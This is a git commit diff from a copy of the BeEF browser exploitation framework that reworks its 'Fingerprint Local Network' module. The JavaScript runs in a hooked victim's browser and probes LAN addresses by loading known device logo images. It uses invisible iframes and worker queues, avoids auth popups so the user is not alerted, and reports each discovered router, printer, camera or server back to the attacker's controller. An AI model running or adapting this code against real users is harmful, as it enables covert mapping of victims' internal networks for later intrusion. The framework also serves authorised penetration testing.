Hiddenden/beef
2
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Merge branch 'master' of https://github.com/beefproject/beef

Browse Source
This commit is contained in:
antisnatchor
2014-10-07 15:22:14 +02:00
parent 209a488c77 3a9c027ef3
commit cfa8a4ae26
4 changed files with 305 additions and 248 deletions
Download Patch File Download Diff File Expand all files Collapse all files

2
.gitignore vendored
View File

@@ -6,3 +6,5 @@ custom-config.yaml
.rvmrc
*.lock
extensions/metasploit/msf-exploits.cache

519
modules/network/internal_network_fingerprinting/command.js
View File

@@ -6,235 +6,306 @@
beef.execute(function() {
var dom = document.createElement('b');
var ips = new Array();
ipRange = "<%= @ipRange %>";
ports = "<%= @ports %>";
if(ports != null){
ports = ports.split(',');
var ips = new Array();
var ipRange = "<%= @ipRange %>";
var ports = "<%= @ports %>";
var timeout = "<%= @timeout %>";
var wait = "<%= @wait %>";
var threads = "<%= @threads %>";
if (ports != null) {
ports = ports.split(',');
}
// set target LAN IP addresses
if (ipRange != null){
// ipRange will be in the form of 192.168.0.1-192.168.0.254
// the fourth octet will be iterated.
// (only C class IP ranges are supported atm)
ipBounds = ipRange.split('-');
lowerBound = ipBounds[0].split('.')[3];
upperBound = ipBounds[1].split('.')[3];
for (i=lowerBound;i<=upperBound;i++){
ipToTest = ipBounds[0].split('.')[0]+"."+ipBounds[0].split('.')[1]+"."+ipBounds[0].split('.')[2]+"."+i;
ips.push(ipToTest);
}
} else {
// use default IPs
ips = [
'192.168.0.1',
'192.168.0.100',
'192.168.0.254',
'192.168.1.1',
'192.168.1.100',
'192.168.1.254',
'10.0.0.1',
'10.1.1.1',
'192.168.2.1',
'192.168.2.254',
'192.168.100.1',
'192.168.100.254',
'192.168.123.1',
'192.168.123.254',
'192.168.10.1',
'192.168.10.254'
];
}
/* Signatures in the form of:
"Dev/App Name", -- string
"Default Port", -- string
"Protocol", -- string -- http/https
"Use Multiple Ports if specified", -- boolean
"IMG path", -- string -- file URI path
"IMG width", -- integer
"IMG height" -- integer
When adding new signatures, try to find images which:
* have a unique URI and width/height combination
* use a valid SSL certificate - invalid certs prevent the resouce from loading
* do not require HTTP authentication - auth popups may alert the user to the scan
*/
var urls = new Array(
new Array(
"Apache",
"80","http",false,
"/icons/apache_pb.gif",259,32),
new Array(
"Apache 2.x",
"80","http",false,
"/icons/apache_pb2.gif",259,32),
new Array(
"Microsoft IIS 7.x",
"80","http",false,
"/welcome.png",571,411),
new Array(
"Microsoft IIS",
"80","http",false,
"/pagerror.gif",36,48),
new Array(
"QNAP NAS",
"8080","http",false,
"/ajax_obj/img/running.gif",16,16),
new Array(
"QNAP NAS",
"443","https",false,
"/cgi-bin/images/login/cloud_portal.png",165,32),
new Array(
"Asus Router",
"80","http",false,
"/images/top-02.gif",359,78),
new Array(
"Belkin Router",
"80","http",false,
"/images/title_2.gif",321,28),
new Array(
"Billion Router",
"80","http",false,
"/customized/logo.gif",318,69),
new Array(
"Billion Router",
"80","http",false,
"/customized/logo.gif",224,55),
new Array(
"Linksys NAS",
"80","http",false,
"/Admin_top.JPG",750,52),
new Array(
"Linksys NAS",
"80","http",false,
"/logo.jpg",194,52),
new Array(
"D-Link DCS Camera",
"80","http",false,
"/devmodel.jpg",127,27),
new Array(
"Linksys Network Camera",
"80","http",false,
"/welcome.jpg",146,250),
new Array(
"Linksys Wireless-G Camera",
"80","http",false,
"/header.gif",750,97),
new Array(
"Cisco IP Phone",
"80","http",false,
"/Images/Logo",120,66),
new Array(
"Snom Phone",
"80","http",false,
"/img/snom_logo.png",168,62),
new Array(
"Dell Laser Printer",
"80","http",false,
"/ews/images/delllogo.gif",100,100),
new Array(
"Brother Printer",
"80","http",false,
"/pbio/brother.gif",144,52),
new Array(
"HP LaserJet Printer",
"80","http",false,
"/hp/device/images/logo.gif",42,27),
new Array(
"HP LaserJet Printer",
"80","http",false,
"/hp/device/images/hp_invent_logo.gif",160,52),
new Array(
"JBoss Application server",
"8080","http",true,
"/images/logo.gif",226,105),
new Array(
"APC InfraStruXure Manager",
"80","http",false,
"/images/Xlogo_Layer-1.gif",342,327),
new Array(
"Barracuda Spam/Virus Firewall",
"8000","http",true,
"/images/powered_by.gif",211,26),
new Array(
"TwonkyMedia Server",
"9000","http",false,
"/images/TwonkyMediaServer_logo.jpg",150,82),
new Array(
"VMware ESXi Server",
"80","http",false,
"/background.jpeg",1,1100),
new Array(
"Microsoft Remote Web Workplace",
"80","http",false,
"/Remote/images/submit.gif",31,31),
new Array(
"XAMPP",
"80","http",false,
"/xampp/img/xampp-logo-new.gif",200,59),
new Array(
"Xerox Printer",
"80","http",false,
"/printbut.gif",30,30),
new Array(
"Konica Minolta Printer",
"80","http",false,
"/G27_light.gif",206,26),
new Array(
"Epson Printer",
"80","http",false,
"/cyandot.gif",1,1),
new Array(
"HP Printer",
"80","http",false,
"/hp/device/images/hp_invent_logo.gif",160,52),
new Array(
"HP Printer Photosmart series",
"80","http",false,
"/webApps/images/hp_d_rgb_m.gif",50,50),
new Array(
"Zenoss",
"8080","http",false,
"/zport/dmd/favicon.ico",16,16),
new Array(
"Wordpress",
"80","http",true,
"/wp-includes/images/wpmini-blue.png",16,16),
new Array(
"Glassfish Server",
"4848","http",false,
"/theme/com/sun/webui/jsf/suntheme/images/login/gradlogsides.jpg", 1, 200),
new Array(
"pfSense",
"443","https",false,
"/themes/pfsense_ng/images/logo.gif",200,56),
new Array(
"m0n0wall",
"80","http",false,
"/logo.gif",150,47)
// Uncommon signatures
//new Array("BeEF","3000","http",false,"/ui/media/images/beef.png",200,149),
//new Array("BeEF (PHP)","80","http",false,"/beef/images/beef.gif",32,32),
//new Array("Siemens Simatic","80",false,"/Images/Siemens_Firmenmarke.gif",115,76),
//new Array("Alt-N MDaemon World Client","3000","http",false,"/LookOut/biglogo.gif",342,98),
//new Array("VLC Media Player","8080","http",false,"/images/white_cross_small.png",9,9),
//new Array("SMC Networks","80","http",false,"/images/logo.gif",133,59),
//new Array("Syncrify","5800","http",false,"/images/468x60.gif",468,60),
//new Array("Winamp Web Interface","80","http",false,"/img?image=121",30,30),
);
checkSignature = function(signature_id, signature_name, proto, ip, port, uri) {
var img = new Image;
var dom = beef.dom.createInvisibleIframe();
dom.setAttribute('id', 'lan_<%= @command_id %>_'+signature_id+'_'+proto+'_'+ip);
beef.debug("[Network Fingerprint] Checking for [" + signature_name + "] at IP [" + ip + "] (" + proto + ")");
img.id = signature_id;
img.src = proto+"://"+ip+":"+port+uri;
img.onerror = function() { dom.removeChild(this); }
img.onload = function() {
if (this.width == urls[this.id][5] && this.height == urls[this.id][6]) {
beef.net.send('<%= @command_url %>', <%= @command_id %>,'discovered='+signature_name+"&url="+escape(this.src));dom.removeChild(this);
beef.debug("[Network Fingerprint] Found [" + signature_name + "] with URL [" + escape(this.src) + "]");
}
}
dom.appendChild(img);
// stop & remove iframe
setTimeout(function() {
if (dom.contentWindow.stop !== undefined) {
dom.contentWindow.stop();
} else if (dom.contentWindow.document.execCommand !== undefined) {
dom.contentWindow.document.execCommand("Stop", false);
}
document.body.removeChild(dom);
}, timeout*1000);
}
WorkerQueue = function(frequency) {
var stack = [];
var timer = null;
var frequency = frequency;
var start_scan = (new Date).getTime();
this.process = function() {
var item = stack.shift();
eval(item);
if (stack.length === 0) {
clearInterval(timer);
timer = null;
var interval = (new Date).getTime() - start_scan;
beef.debug("[Network Fingerprint] Worker queue is complete ["+interval+" ms]");
return;
}
}
if(ipRange != null){
// ipRange will be in the form of 192.168.0.1-192.168.0.254: the fourth octet will be iterated.
// (only C class IPs are supported atm)
ipBounds = ipRange.split('-');
lowerBound = ipBounds[0].split('.')[3];
upperBound = ipBounds[1].split('.')[3];
this.queue = function(item) {
stack.push(item);
if (timer === null) {
timer = setInterval(this.process, frequency);
}
}
for(i=lowerBound;i<=upperBound;i++){
ipToTest = ipBounds[0].split('.')[0]+"."+ipBounds[0].split('.')[1]+"."+ipBounds[0].split('.')[2]+"."+i;
ips.push(ipToTest);
}
// create worker queue
var workers = new Array();
for (w=0; w < threads; w++) {
workers.push(new WorkerQueue(wait*1000));
}
// for each URI signature
for (var u=0; u < urls.length; u++) {
var worker = workers[u % threads];
// for each LAN IP address
for (var i=0; i < ips.length; i++) {
if (!urls[u][3]) {
// use default port
worker.queue('checkSignature("'+u+'","'+urls[u][0]+'","'+urls[u][2]+'","'+ips[i]+'","'+urls[u][1]+'","'+urls[u][4]+'");');
} else {
// iterate through all the specified ports
for (var p=0; p < ports.length; p++) {
worker.queue('checkSignature("'+u+'","'+urls[u][0]+'","'+urls[u][2]+'","'+ips[i]+'","'+ports[p]+'","'+urls[u][4]+'");');
}
}else{
//use default IPs
ips = [
'192.168.0.1',
'192.168.0.100',
'192.168.0.254',
'192.168.1.1',
'192.168.1.100',
'192.168.1.254',
'10.0.0.1',
'10.1.1.1',
'192.168.2.1',
'192.168.2.254',
'192.168.100.1',
'192.168.100.254',
'192.168.123.1',
'192.168.123.254',
'192.168.10.1',
'192.168.10.254'
];
}
}
}
/* URLs in the form of:
"Dev/App Name", -- string
"Default Port", -- string
"Protocol", -- string -- http/https
"Use Multiple Ports if specified", -- boolean
"IMG path", -- string -- file path
"IMG width", -- integer
"IMG height" -- integer
*/
var urls = new Array(
new Array(
"Apache",
"80","http",false,
"/icons/apache_pb.gif",259,32),
new Array(
"Apache 2.x",
"80","http",false,
"/icons/apache_pb2.gif",259,32),
new Array(
"Microsoft IIS 7.x",
"80","http",false,
"/welcome.png",571,411),
new Array(
"Microsoft IIS",
"80","http",false,
"/pagerror.gif",36,48),
new Array(
"QNAP NAS",
"8080","http",false,
"/ajax_obj/img/running.gif",16,16),
new Array(
"QNAP NAS",
"8080","http",false,
"/ajax_obj/images/qnap_logo_w.gif",115,21),
new Array(
"Belkin Router",
"80","http",false,
"/images/title_2.gif",321,28),
new Array(
"Billion Router",
"80","http",false,
"/customized/logo.gif",318,69),
new Array(
"Billion Router",
"80","http",false,
"/customized/logo.gif",224,55),
// new Array("SMC Networks","80","http",false,"/images/logo.gif",133,59),
new Array(
"Linksys NAS",
"80","http",false,
"/Admin_top.JPG",750,52),
new Array(
"Linksys NAS",
"80","http",false,
"/logo.jpg",194,52),
new Array(
"Linksys Network Camera",
"80","http",false,
"/welcome.jpg",146,250),
new Array(
"Linksys Wireless-G Camera",
"80","http",false,
"/header.gif",750,97),
new Array(
"Cisco IP Phone",
"80","http",false,
"/Images/Logo",120,66),
new Array(
"Snom Phone",
"80","http",false,
"/img/snom_logo.png",168,62),
new Array(
"Dell Laser Printer",
"80","http",false,
"/ews/images/delllogo.gif",100,100),
new Array(
"Brother Printer",
"80","http",false,
"/pbio/brother.gif",144,52),
new Array(
"HP LaserJet Printer",
"80","http",false,
"/hp/device/images/logo.gif",42,27),
new Array(
"HP LaserJet Printer",
"80","http",false,
"/hp/device/images/hp_invent_logo.gif",160,52),
new Array(
"JBoss Application server",
"8080","http",true,
"/images/logo.gif",226,105),
// new Array("Siemens Simatic","80",false,"/Images/Siemens_Firmenmarke.gif",115,76),
new Array(
"APC InfraStruXure Manager",
"80","http",false,
"/images/Xlogo_Layer-1.gif",342,327),
new Array(
"Barracuda Spam/Virus Firewall",
"8000","http",true,
"/images/powered_by.gif",211,26),
new Array(
"TwonkyMedia Server",
"9000","http",false,
"/images/TwonkyMediaServer_logo.jpg",150,82),
// new Array("Alt-N MDaemon World Client","3000","http",false,"/LookOut/biglogo.gif",342,98),
// new Array("VLC Media Player","8080","http",false,"/images/white_cross_small.png",9,9),
new Array(
"VMware ESXi Server",
"80","http",false,
"/background.jpeg",1,1100),
new Array(
"Microsoft Remote Web Workplace",
"80","http",false,
"/Remote/images/submit.gif",31,31),
new Array(
"XAMPP",
"80","http",false,
"/xampp/img/xampp-logo-new.gif",200,59),
new Array(
"Xerox Printer",
"80","http",false,
"/printbut.gif",30,30),
new Array(
"Konica Minolta Printer",
"80","http",false,
"/G27_light.gif",206,26),
new Array(
"Epson Printer",
"80","http",false,
"/cyandot.gif",1,1),
new Array(
"HP Printer",
"80","http",false,
"/hp/device/images/hp_invent_logo.gif",160,52),
// new Array("Syncrify","5800","http",false,"/images/468x60.gif",468,60),
// new Array("Winamp Web Interface","80","http",false,"/img?image=121",30,30),
new Array(
"Zenoss",
"8080","http",false,
"/zport/dmd/favicon.ico",16,16),
new Array(
"BeEF",
"3000","http",false,
"/ui/media/images/beef.png",200,149),
new Array(
"BeEF (PHP)",
"80","http",false,
"/beef/images/beef.gif",32,32),
new Array(
"Wordpress",
"80","http",true,
"/wp-includes/images/wpmini-blue.png",16,16),
new Array(
"Glassfish Server",
"4848","http",false,
"/theme/com/sun/webui/jsf/suntheme/images/login/gradlogsides.jpg", 1, 200),
new Array(
"pfSense",
"443","https",false,
"/themes/pfsense_ng/images/logo.gif",200,56),
new Array(
"m0n0wall",
"80","http",false,
"/logo.gif",150,47)
);
// for each ip
for(var i=0; i < ips.length; i++) {
// for each url
for(var u=0; u < urls.length; u++) {
if(!urls[u][3] && ports != null){ // use default port
var img = new Image;
beef.debug("Detecting [" + urls[u][0] + "] at IP [" + ips[i] + "]");
img.id = u;
img.src = urls[u][2]+"://"+ips[i]+":"+urls[u][1]+urls[u][4];
img.onload = function() { if (this.width == urls[this.id][5] && this.height == urls[this.id][6]) { beef.net.send('<%= @command_url %>', <%= @command_id %>,'discovered='+escape(urls[this.id][0])+"&url="+escape(this.src));dom.removeChild(this); } }
dom.appendChild(img);
} else { // iterate to all the specified ports
for(p=0;p<ports.length;p++){
var img = new Image;
beef.debug("Detecting [" + urls[u][0] + "] at IP [" + ips[i] + "], port [" + ports[p] + "]");
img.id = u;
img.src = urls[u][2]+"://"+ips[i]+":"+ports[p]+urls[u][4];
img.onload = function() { if (this.width == urls[this.id][5] && this.height == urls[this.id][6]) { beef.net.send('<%= @command_url %>', <%= @command_id %>,'discovered='+escape(urls[this.id][0])+"&url="+escape(this.src));dom.removeChild(this); } }
dom.appendChild(img);
}
}
}
}
});

8
modules/network/internal_network_fingerprinting/config.yaml
View File

@@ -8,9 +8,9 @@ beef:
internal_network_fingerprinting:
enable: true
category: "Network"
name: "Fingerprint Network"
description: "Discover devices and applications in the network of the victim using signatures like default logo images/favicons (partially based on the Yokoso idea)."
authors: ["bcoles@gmail.com", "wade", "antisnatchor"]
name: "Fingerprint Local Network"
description: "Discover devices and applications in the victim's Local Area Network.<br/><br/>This module uses a signature based approach - based on default logo images/favicons for known network device/applications - to fingerprint each IP address within the LAN.<br/><br/>Partially based on <a href='http://yokoso.inguardians.com/'>Yokosou</a> and <a href='http://code.google.com/p/jslanscanner/'>jslanscanner</a>."
authors: ["bcoles", "wade", "antisnatchor"]
target:
user_notify: ["FF", "IE", "C"]
user_notify: ["FF", "IE", "C", "S"]
not_working: ["O"]

24
modules/network/internal_network_fingerprinting/module.rb
View File

@@ -3,32 +3,16 @@
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
#
# Internal Network Fingerprinting
# Discover devices and applications in the internal network of the victim using
# signatures like default logo images/favicons (partially based on the Yokoso idea).
# It does this by loading images on common/predefined local network
# IP addresses then matching the image width, height and path to those
# for a known device.
#
# TODO LIST
# Add IPv6 support
# Add HTTPS support
# - Devices with invalid certs are blocked by IE and FF by default
# Improve stealth
# - Load images with CSS "background:" CSS to avoid http auth login popups
# Improve speed
# - Detect local ip range first - using browser history and/or with java
# - History theft via CSS history is patched in modern browsers.
# - Local IP theft with Java is slow and may fail
class Internal_network_fingerprinting < BeEF::Core::Command
def self.options
return [
{'name' => 'ipRange', 'ui_label' => 'Scan IP range (C class)', 'value' => '192.168.0.1-192.168.0.254'},
{'name' => 'ports', 'ui_label' => 'Ports to test', 'value' => '80,8080'}
{'name' => 'ports', 'ui_label' => 'Ports to test', 'value' => '80,8080'},
{'name' => 'threads', 'ui_label' => 'Workers', 'value' => '5'},
{'name' => 'wait', 'ui_label' => 'Wait (s) between each request for each worker', 'value' => '2'},
{'name' => 'timeout', 'ui_label' => 'Timeout for each request (s)', 'value' => '10'}
]
end